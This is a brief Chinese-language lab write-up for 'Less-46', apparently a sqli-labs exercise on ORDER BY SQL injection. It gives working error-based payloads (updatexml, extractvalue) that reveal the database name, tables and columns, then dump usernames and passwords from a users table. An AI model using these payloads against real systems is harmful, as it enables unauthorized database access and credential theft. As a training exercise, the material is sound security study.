Less(46)
1.看一下php
(1)用order by 注入来看看
(2)通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入
?sort=1+asc
?sort=1+desc
2.报错注入
(1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0))
(2)爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="security" and table_name not in('emails','referers'))),0))
(3)爆列名:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in('first_name','last_name','user_id','last_login','avatar','failed_login','user'))),0))
(4)爆值:?sort=1 and (extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))))